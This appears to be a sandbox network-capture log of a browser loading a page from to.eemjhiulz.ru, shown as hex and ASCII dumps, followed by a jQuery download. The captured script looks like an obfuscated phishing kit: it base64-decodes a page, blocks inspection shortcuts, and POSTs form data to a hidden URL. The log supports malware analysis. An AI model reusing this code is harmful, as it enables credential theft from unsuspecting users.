                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JTAFZ4mHyJPr6GQp%2B98xCUHafnBA7dfh3CyCDT%2B%2FXOPm6LEySWwkpeH4cGC0tbOMRSaVBvZ%2FkxCNV3LUsnUx1Vnu%2FXYDNkvsbJOR3TGQxZUpCNODC2si%2Ffc9T8qwJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=4610&min_rtt=4574&rtt_var=1354&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1597&delivery_rate=593828&cwnd=251&unsent_bytes=0&cid=a21ae66090adaa50&ts=109&x=0"
                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6InZXYU9uSG80Tk5zNURUZDNkKytMMXc9PSIsInZhbHVlIjoiTDdlbTlqUWJZSTA0V2JBZkJzZkR4bVhGaC9jVHBrRUVtcnMrY0E3eTU4cXdZMEMvSzRVTElTVHpXSEZqRURFZkgrV3hoekhOcTkyaVZlMVJmeFhBWkRtUmRBaWNycWw2OWllOFQzRW5EL3lVSzhvMXYxaXkxbmQ2Yld3VWVadG8iLCJtYWMiOiJjOTg2NWRkMGY1MmI0OThhN2NmYWY4YjU5ZTc1MDM4MjBhNTZiNDYyOTk3YjY0ODM4YjkxOGIwYjc2ODQ1YzI4IiwidGFnIjoiIn0%3D; expires=Thu, 19-Dec-2024 00:41:44 GMT; Max-Age=7200; path=/; secure; samesite=none
                                              2024-12-18 22:41:44 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 6c 71 62 48 56 33 55 31 42 51 65 47 31 79 61 47 45 32 54 56 6c 56 55 6c 4a 45 65 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 57 73 35 52 32 39 72 56 7a 4e 48 4e 6a 42 48 4f 48 49 7a 53 55 74 58 57 55 4e 71 5a 58 6c 71 59 58 67 78 4f 57 68 43 54 30 6f 78 61 6e 64 74 54 32 39 51 62 32 74 4c 4b 33 56 6f 55 32 67 72 56 6c 4e 6d 63 46 51 32 4c 33 6c 50 63 43 39 44 62 31 4e 6c 65 6a 56 77 5a 46 64 46 52 6b 51 32 64 47 70 43 64 48 67 34 51 32 73 33 54 33 52 78 4e 7a 64 55 52 6e 4a 58 5a 45 52 4b 59 32 74 4f 5a 58 6c 73 56 6b 68 72 64 46 4a 6c 54 32 52 69 61 55 31 55 59 54 56 31 54 6d 6f 7a 54 54 5a 6c 61 32 63 76 4f 47 35 33 63 6c 6b
                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IklqbHV3U1BQeG1yaGE2TVlVUlJEeFE9PSIsInZhbHVlIjoiVWs5R29rVzNHNjBHOHIzSUtXWUNqZXlqYXgxOWhCT0oxandtT29Qb2tLK3VoU2grVlNmcFQ2L3lPcC9Db1NlejVwZFdFRkQ2dGpCdHg4Q2s3T3RxNzdURnJXZERKY2tOZXlsVkhrdFJlT2RiaU1UYTV1TmozTTZla2cvOG53clk
                                              2024-12-18 22:41:44 UTC1369INData Raw: 38 36 66 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 68 6f 77 20 68 69 67 68 20 79 6f 75 20 62 6f 75 6e 63 65 20 77 68 65 6e 20 79 6f 75 20 68 69 74 20 62 6f 74 74 6f 6d 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 55 62 79 35 6c 5a 57 31 71 61 47 6c 31 62 48 6f 75 63 6e 55 76 65 6b 38 33 55 6b 5a 4f 52 79 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43
                                              Data Ascii: 86f<script>/* Success is how high you bounce when you hit bottom. */if(atob("aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgIC
                                              2024-12-18 22:41:44 UTC797INData Raw: 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 63 77 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 69 42 68 64 58 52 76 4f 33 30 4e 43 69 4e 6d 57 55 78 57 53 55 5a
                                              Data Ascii: dGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTcwcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNmWUxWSUZ
                                              2024-12-18 22:41:44 UTC1369INData Raw: 63 36 37 0d 0a 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 6d 57 55 78 57 53 55 5a 76 5a 6d 46 34 49 43 35 74 64 43 30 30 49 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 78 63 6d 56 74 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 5a 6c 6c 4d 56 6b 6c 47 62 32 5a 68 65 43 41 6a 65 6d 56 73 61 31 6c 34 61 31 46 7a 5a 53 42 37 59 32 39 73 62 33 49 36 49 43 4d 32 59 7a 63 31 4e 32 51 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 30 63 48 67 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4c 6a 56 79 5a 57 30 37 66 51 30 4b 49 43 41 67 49 44 77 76 63 33 52 35 62 47 55 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 44 34 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 62 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 64 6c 59 6d 52 79 61
                                              Data Ascii: c67wb3J0YW50O30NCiNmWUxWSUZvZmF4IC5tdC00IHttYXJnaW4tdG9wOiAxcmVtIWltcG9ydGFudDt9DQojZllMVklGb2ZheCAjemVsa1l4a1FzZSB7Y29sb3I6ICM2Yzc1N2Q7Zm9udC1zaXplOjE0cHg7bWFyZ2luLXRvcDogLjVyZW07fQ0KICAgIDwvc3R5bGU+DQogICAgPHNjcmlwdD4NCiAgICBpZiAobmF2aWdhdG9yLndlYmRya
                                              2024-12-18 22:41:44 UTC1369INData Raw: 6c 64 47 46 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4f 44 55 70 44 51 6f 67 49 43 41 67 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 70 39 4b 54 73 4e 43 6d 52 76 59 33 56 74 5a 57 35 30 4c 6d 46 6b 5a 45 56 32 5a 57 35 30 54 47 6c 7a 64 47 56 75 5a 58 49 6f 4a 32 4e 76 62 6e 52 6c 65 48 52 74 5a 57 35 31 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58
                                              Data Ascii: ldGFLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gODUpDQogICAgKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQp9KTsNCmRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoJ2NvbnRleHRtZW51JywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBldmVudC5wcmV2ZW50RGVmYX
                                              2024-12-18 22:41:44 UTC444INData Raw: 50 67 30 4b 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 59 32 5a 66 64 48 56 79 62 6e 4e 30 61 57 78 6c 49 69 42 70 5a 44 30 69 59 32 59 69 50 6a 77 76 5a 47 6c 32 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6e 4e 70 5a 43 49 67 62 6d 46 74 5a 54 30 69 63 32 6c 6b 49 69 42 32 59 57 78 31 5a 54 30 69 62 31 49 78 51 33 70 4b 4d 7a 46 78 4e 6a 41 30 61 30 4e 32 4e 58 51 34 61 47 31 6e 55 54 4a 50 63 58 46 70 63 57 35 7a 52 45 39 50 56 45 35 77 59 33 70 36 61 79 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 63 47 46 6e 5a 57 78 70 62 6d 73 69 49 47 35 68 62 57 55 39 49 6e 42 68 5a 32 56 73 61 57 35 72 49 69 42 32 59 57 78
                                              Data Ascii: Pg0KPGRpdiBjbGFzcz0iY2ZfdHVybnN0aWxlIiBpZD0iY2YiPjwvZGl2Pg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9InNpZCIgbmFtZT0ic2lkIiB2YWx1ZT0ib1IxQ3pKMzFxNjA0a0N2NXQ4aG1nUTJPcXFpcW5zRE9PVE5wY3p6ayI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0icGFnZWxpbmsiIG5hbWU9InBhZ2VsaW5rIiB2YWx
                                              2024-12-18 22:41:44 UTC1369INData Raw: 33 39 30 39 0d 0a 35 35 64 58 68 70 62 6d 64 72 5a 58 52 68 62 6d 63 75 59 32 39 74 4c 79 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 48 56 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 64 57 45 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52
                                              Data Ascii: 390955dXhpbmdrZXRhbmcuY29tLyI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZHVhIiBuYW1lPSJibHRkdWEiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnR
                                              2024-12-18 22:41:44 UTC1369INData Raw: 48 73 4e 43 69 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 64 47 56 34 64 43 67 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 30 5a 58 68 30 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 68 30 5a 58 68 30 49 44 30 39 49 44 41 70 65 77 30 4b 49 43 41 67 49 47 5a 6c 64 47 4e 6f 4b 47 6c 43 56 6e 52 4e 63 45 4a 57 55 33 41 73 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 57 56 30 61 47 39 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 58 62 46 46 76 53 57 74 74 51 6b 4e 70 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b
                                              Data Ascii: HsNCiAgICByZXR1cm4gcmVzcG9uc2UudGV4dCgpDQogICAgfSkudGhlbih0ZXh0ID0+IHsNCiAgICBpZih0ZXh0ID09IDApew0KICAgIGZldGNoKGlCVnRNcEJWU3AsIHsNCiAgICAgICAgbWV0aG9kOiAiUE9TVCIsDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YShXbFFvSWttQkNpKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0K
                                              2024-12-18 22:41:44 UTC1369INData Raw: 6f 59 69 62 59 61 71 45 63 20 3f 20 6d 5a 61 6c 44 6d 52 4c 6a 6f 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 6d 5a 61 6c 44 6d 52 4c 6a 6f 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 50 65 72 73 69 73 74 65 6e 63 65 20 69 73 20 74 68 65 20 6b 65 79 20 74 6f 20 61 63 68 69 65 76 69 6e 67 20 67 72 65 61 74 20 74 68 69 6e 67 73 2e 20 2a 2f 0d 0a 69 66 28 49 79 4a 65 45 45 6a 78 4d 63 20 3d 3d 20 4f 6f 59 69 62 59 61 71 45 63 29 7b 0d 0a 63 6f 6e 73 74 20 73 64 5a 5a 54 6c 56 7a 78 68 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66
                                              Data Ascii: oYibYaqEc ? mZalDmRLjo.hostname : mZalDmRLjo.hostname.split('.').slice(-2).join('.');/* Persistence is the key to achieving great things. */if(IyJeEEjxMc == OoYibYaqEc){const sdZZTlVzxh = window.location.pathname.split('%23')[0].split('%3F')[0];if
                                              2024-12-18 22:41:44 UTC1369INData Raw: 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 32 5a 5a 54 46 5a 4a 52 6d 39 6d 59 58 67 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 32 5a 5a 54 46 5a 4a 52 6d 39 6d 59 58 67 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 5a 6c 6c 4d 56 6b 6c 47 62 32 5a 68 65 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a
                                              Data Ascii: 0dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI2ZZTFZJRm9mYXggaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI2ZZTFZJRm9mYXggaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojZllMVklGb2ZheCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOj


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449756151.101.66.1374434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:45 UTC621OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                              Host: code.jquery.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://to.eemjhiulz.ru/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:46 UTC613INHTTP/1.1 200 OK
                                              Connection: close
                                              Content-Length: 89501
                                              Server: nginx
                                              Content-Type: application/javascript; charset=utf-8
                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                              ETag: "28feccc0-15d9d"
                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                              Access-Control-Allow-Origin: *
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Via: 1.1 varnish, 1.1 varnish
                                              Accept-Ranges: bytes
                                              Age: 3083238
                                              Date: Wed, 18 Dec 2024 22:41:46 GMT
                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740073-EWR
                                              X-Cache: HIT, HIT
                                              X-Cache-Hits: 2774, 0
                                              X-Timer: S1734561706.246033,VS0,VE1
                                              Vary: Accept-Encoding
                                              2024-12-18 22:41:46 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                              2024-12-18 22:41:46 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                              2024-12-18 22:41:46 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                              2024-12-18 22:41:46 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                              2024-12-18 22:41:46 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                              Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                              2024-12-18 22:41:46 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                              Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
